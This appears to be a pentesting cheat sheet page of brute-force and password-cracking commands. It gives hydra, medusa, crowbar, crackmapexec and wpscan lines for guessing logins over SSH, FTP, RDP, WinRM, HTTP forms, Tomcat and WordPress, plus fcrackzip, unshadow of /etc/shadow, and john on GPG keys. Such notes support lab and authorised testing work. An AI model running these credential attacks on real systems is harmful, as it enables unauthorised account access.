Bruteforce

Medusa

medusa -h <IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

Tomcat GET:

hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<IP>:8080/manager/html

RDP:

crowbar -b rdp -s <IP> -u <admin> -C rockyou.txt -n 1

Evil-winrm:

 crackmapexec winrm <IP> -d <domain> -u users.txt -p password.txt

SSH:

hydra -l <user> -P /usr/share/wordlists/rokyou.txt <ssh>://<IP> -s <port>
hydra -l <user> -P /usr/share/wordlists/metasploit/unix_passwords.txt <IP> ssh -t 4 -V

HTTP-GET

hydra -l <user> -P /usr/share/wordlists/rockyou.txt http-get://<IP>

HTTP-POST

hydra <IP> http-form-post <"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN"> -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

FTP

hydra -l <user> -P /usr/share/wordlists/rockyou.txt -vV <IP> ftp

ZIP

fcrackzip -v -u -b -D -p /usr/share/wordlists/rockyou.txt secrets.zip

Unshadow

/etc/shadow + /etc/passwd
# Grab both and do the following command
unshadow <passwd file> <shadow file> > unshadowed.txt

WordPress

wpscan --url <IP> -U users.txt -P pass.txt
wpscan --url http://test.com/

ASC

gpg2john tryhackme.asc > hash
john hash -w=/usr/share/wordlists/rockyou.txt
gpg —import tryhackme.asc # Enter the passphrase
gpg —decrypt credentials.pgp

PreviousPassword Cracking NextHash Crack

Last updated 1 year ago

Was this helpful?